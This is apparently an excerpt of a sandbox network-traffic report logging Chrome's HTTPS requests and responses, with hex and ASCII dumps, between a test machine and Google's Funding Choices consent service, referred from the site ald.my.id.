                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC484INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 20 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 3e 0a 3c 74 72 3e 3c 74 68 3e 55 52 49 3a 3c 2f 74 68 3e 3c 74 64 3e 2f 36 2f 6d 61 70 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 54 41 54 55 53 3a 3c 2f 74 68 3e 3c 74 64 3e 34 30
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8"/><title>Error 405 Method Not Allowed</title></head><body><h2>HTTP ERROR 405 Method Not Allowed</h2><table><tr><th>URI:</th><td>/6/map</td></tr><tr><th>STATUS:</th><td>40


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          124192.168.2.749897142.250.185.1104432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC829OUTPOST /el/AGSKWxVAzDHl_-4j7DcCm6sYAbWFlq_mBsm_FyV6OOGNZcwDj1f1wVJJMJDPrG-A9X0dMOs9_cpdPTFlXO6fLqszIBQTCWLwCy0Y8TKsIXcvGA8rLOoYiWyUoC1SpBcoK0frF33KE48rcg== HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 155
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://ald.my.id
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC155OUTData Raw: 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 37 32 38 38 39 37 31 36 30 33 33 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 33 2c 31 5d 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 5d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: [null,null,null,null,null,null,null,null,1728897160331,null,null,[[3,1]],null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,0]
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC1868INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ald.my.id
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:42 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorLoggingHttp/cspreport
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-lolsFuRyxujIQF74wJp47A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorLoggingHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorLoggingHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                                                                          reporting-endpoints: default="/_/ContributorLoggingHttp/web-reports?context=eJzj0tDikmLw15BicEqfwRoCxO5aF1n9gfjrnkusf4F478dLrEeBWIibo-vg5h1sAg_2N4UpuSTlF8Yn5-eVpOaV6CamFOuC2EWZSaUl-UUo7NQykIqc_PT0zLz0eCMDIxNDA0MDPQOz-AIDAKRDLu4"
                                                                                                                                                                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          125192.168.2.749898142.250.185.1424432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC699OUTGET /f/AGSKWxX5zRX28eITzjJdCpLjeEeUzny5Gtt2HV7BffKc_f32tqAyqI-vwhlcT3j6MPwthxeOORbGEFlfHog780WZrbkKPCX_VEvso6NYDKW9wlcY2qsAZbhNI71RowP_G9I8NVVHim-fGLp3GD0qarIAmwEyoDTZ7JnQ7VvvpvSNA_P7mst2xnB2o5NQK7q9/_/ad-background./inlinetextads?_gads_footer./adgear2-/ads_top_ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC1896INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:42 GMT
                                                                                                                                                                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-UUj57zwdPRMQ_U3yk5uDWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorGlobalRouterHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorGlobalRouterHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorGlobalRouterHttp/cspreport
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                                          reporting-endpoints: default="/_/ContributorGlobalRouterHttp/web-reports?context=eJzjqtDikmJw1JBiOO90h-k6EEt8fcmkBcRO6TNYQ4C49eY51ulAnPTvPGsJELtrXWT1B2JDhUuszkDsWHSJ1ROIVXsusZoD8f11l1ifA_HXPZdY_wLx3o-XWI8CcZHEFdYWIL7ddIX1MRAL8XB0Hdy8g01gxaIvLYxKGkn5hfHJ-XklRZlJpSX5RWnJaanFqUVlqUXxRgZGJoYGBpZ6BkbxBQYAOp1KSg"
                                                                                                                                                                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC60INData Raw: 33 36 0d 0a 77 69 6e 64 6f 77 5b 27 35 62 62 38 63 35 62 31 2d 31 62 63 61 2d 34 61 38 31 2d 39 61 61 61 2d 63 38 66 63 61 62 61 36 32 32 61 32 27 5d 20 3d 20 74 72 75 65 3b 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 36window['5bb8c5b1-1bca-4a81-9aaa-c8fcaba622a2'] = true;
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          126192.168.2.749902142.250.185.1104432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC829OUTPOST /el/AGSKWxVAzDHl_-4j7DcCm6sYAbWFlq_mBsm_FyV6OOGNZcwDj1f1wVJJMJDPrG-A9X0dMOs9_cpdPTFlXO6fLqszIBQTCWLwCy0Y8TKsIXcvGA8rLOoYiWyUoC1SpBcoK0frF33KE48rcg== HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 158
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://ald.my.id
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC158OUTData Raw: 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 37 32 38 38 39 37 31 36 30 34 37 33 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 5b 31 5d 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 5d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: [null,null,null,null,null,null,null,null,1728897160473,null,null,[null,[1]],null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,0]
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC1869INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ald.my.id
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:42 GMT
                                                                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-z_SiEroLYNINo9Gcmo1Y4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorLoggingHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorLoggingHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorLoggingHttp/cspreport
                                                                                                                                                                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                          reporting-endpoints: default="/_/ContributorLoggingHttp/web-reports?context=eJzj0tDikmII1JBicEqfwRoCxO5aF1n9gfjrnkusf4F478dLrEeBWIiHo-vg5h1sAh8mtfUwKrkk5RfGJ-fnlaTmlegmphTrgthFmUmlJflFKOzUMpCKnPz09My89HgjAyMTQwNDAz0Ds_gCAwDDpy8P"
                                                                                                                                                                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          127192.168.2.749903142.250.185.1104432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC1059OUTGET /f/AGSKWxVA2AfsAy6bl_orgjLa-ktICoGbho28bTgmHZldatP8mM9GwgjDSaR33p-zQ4Z3psf-T6y01RyIJMRcXpsGke0ygK7nxYIumXDTYW3tVyk60W-PkqmH1keGLWmdi96iIP5_4zM-Fg==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzI4ODk3MTYwLDQ3NzAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNl0sbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsMV0sImh0dHBzOi8vYWxkLm15LmlkLyIsbnVsbCxbWzgsInRhQmdHdlJRQzIwIl0sWzksImVuLVVTIl0sWzE4LCJbW1swXV1dIl0sWzE5LCIyIl0sWzE3LCJbMF0iXV1d HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC1918INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:42 GMT
                                                                                                                                                                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorGlobalRouterHttp/cspreport
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-H4NsHWdCCMkTUZG8Gg7g5Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorGlobalRouterHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorGlobalRouterHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          reporting-endpoints: default="/_/ContributorGlobalRouterHttp/web-reports?context=eJzjqtDikmII1pBiOO90h-k6EEt8fcmkAcRO6TNYg4C49eY51qlAnPTvPGsRELtrXWT1B2JDhUusjiBcdInVE4hVey6xmgLx_XWXWJ8D8dc9l1j_AvHej5dYjwJxkcQV1iYgvt10hfUxEAvxcHQd3LyDTaBj7tk5jEoaSfmF8cn5eSVFmUmlJflFaclpqcWpRWWpRfFGBkYmhgYGlnoGRvEFBgA2fEoa"
                                                                                                                                                                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC1918INData Raw: 62 36 64 0d 0a 69 66 20 28 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 2e 66 63 4b 65 72 6e 65 6c 4d 61 6e 61 67 65 72 2e 72 75 6e 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 29 20 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 76 61 72 20 45 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 75 28 61 29 7d 3b 5f 2e 79 28 45 44 2c 5f 2e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: b6dif (typeof __googlefc.fcKernelManager.run === 'function') {"use strict";this.default_ContributorServingResponseClientJs=this.default_ContributorServingResponseClientJs||{};(function(_){var window=this;try{var ED=function(a){this.l=_.u(a)};_.y(ED,_.
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC1014INData Raw: 61 67 65 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 5c 2f 66 5c 2f 41 47 53 4b 57 78 55 55 34 7a 78 48 34 31 4d 5f 71 38 44 77 72 2d 49 32 65 53 36 4b 34 67 48 56 5f 4e 63 54 73 59 39 69 45 43 77 58 38 41 66 5f 57 79 35 4d 63 6b 5f 42 57 64 76 73 76 78 37 61 6e 32 64 71 64 7a 4d 50 42 78 49 78 64 78 68 69 57 75 4f 67 74 6b 34 36 35 53 33 55 46 45 6f 50 73 71 72 44 54 72 48 4f 54 50 6f 48 49 54 6f 4b 31 66 45 5a 6e 41 4a 71 32 37 76 72 59 61 63 6c 4b 34 56 39 45 53 43 6d 39 50 46 52 4f 67 5c 5c 5c 5c 75 30 30 33 64 5c 5c 5c 5c 75 30 30 33 64 5c 5c 5c 78 32 32 5c 78 35 64 2c 5c 78 35 62 6e 75 6c 6c 2c 5c 78 35 62 37 2c 36 5c 78 35 64 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c
